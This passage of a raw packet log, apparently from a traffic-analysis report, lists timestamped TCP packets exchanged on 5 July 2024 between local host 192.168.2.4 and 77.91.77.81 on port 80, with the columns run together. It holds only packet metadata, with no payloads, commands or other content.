                                                                Jul 5, 2024 04:36:12.756436110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756443024 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756448984 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756463051 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756467104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756479025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756495953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756508112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756525993 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756525993 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756548882 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756582022 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756603956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756616116 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756645918 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756650925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756659985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756668091 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756686926 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756700993 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756705999 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756711960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756722927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756742001 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756747961 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756757021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756767988 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756769896 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756791115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756797075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756812096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756813049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756834030 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756835938 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756844997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756875038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756891966 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.756947994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756958008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756968021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.756993055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757014990 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757021904 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757034063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757044077 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757055044 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757066965 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757069111 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757102013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757122040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757127047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757138968 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757167101 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757219076 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757435083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757446051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757455111 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757466078 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757483006 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757493973 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757498026 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757498026 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757503986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757519007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757524967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757529974 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757543087 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757545948 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757560015 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757565975 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757570982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757582903 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757585049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757592916 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757610083 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757611990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757623911 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757627964 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757635117 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757647038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757659912 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757668972 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757673979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757684946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757689953 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757695913 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757709026 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757710934 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757731915 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757739067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757750034 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757751942 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757761002 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757772923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757772923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757791042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757798910 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757802963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.757822990 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.757870913 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.775365114 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.775377035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.775388002 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.775399923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.775408030 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.775440931 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.775455952 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.775465965 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.775465965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.775516987 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.775516987 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.790591955 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790611029 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790657043 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.790810108 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790833950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790843964 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790863991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.790895939 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.790900946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790916920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790930986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790941954 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790945053 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.790971041 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.790978909 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790992022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.790997982 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.791002989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.791028976 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.791081905 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811223984 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811235905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811244965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811275959 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811290026 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811300993 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811306000 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811316967 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811327934 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811336040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811351061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811357021 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811362028 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811372995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811382055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811404943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811408043 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811417103 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811443090 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811443090 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811467886 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811496973 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811506987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811522961 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811532974 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811543941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811562061 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811572075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811579943 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811583996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811609983 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811620951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.811623096 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.811659098 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.845848083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845864058 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845875025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845886946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845899105 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845926046 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.845959902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845968962 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.845971107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845982075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845993042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.845998049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846029043 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846029997 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846039057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846052885 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846065044 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846072912 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846076965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846091986 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846107960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846117973 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846126080 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846131086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846148014 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846165895 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846170902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846183062 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846193075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846214056 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846220970 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846231937 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846256971 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846256971 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846273899 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846278906 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846283913 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846296072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846307039 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846324921 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846324921 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846335888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846343040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846348047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846360922 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846378088 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846385956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846398115 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846399069 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846407890 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846421003 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846436024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846446991 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846456051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846482038 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846483946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846493959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846517086 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846534967 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846537113 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846545935 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846558094 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846575022 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846601009 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846621990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846632004 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846641064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846651077 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846661091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846671104 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846702099 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846710920 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846710920 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846712112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846740007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846750021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846750021 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846761942 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846771002 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846776009 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846782923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846808910 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846827030 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846829891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846837997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846877098 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846878052 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846885920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846926928 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846935987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846946001 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846956015 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846982956 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.846985102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.846997023 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847004890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847009897 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847022057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847027063 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847032070 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847048998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847076893 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847088099 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847090006 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847090006 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847142935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847170115 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847181082 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847191095 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847201109 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847213984 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847218990 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847224951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847242117 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847279072 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847279072 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847280979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847292900 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847326040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847347975 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847362995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847373962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847384930 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847398043 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847414017 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847444057 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847455978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847465992 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847475052 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847505093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847516060 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847517967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847517967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847527027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847549915 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847551107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.847573042 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.847596884 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.865305901 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.865315914 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.865325928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.865364075 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.865381002 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.865385056 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.865391970 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.865405083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.865416050 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.865443945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.865443945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.865483999 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880615950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880636930 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880646944 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880682945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880685091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880697012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880712986 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880738020 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880742073 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880753994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880763054 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880785942 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880795956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880805969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880808115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880825996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880841970 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880845070 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880852938 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880868912 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880882978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880893946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.880893946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880919933 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.880924940 CEST804973177.91.77.81192.168.2.4
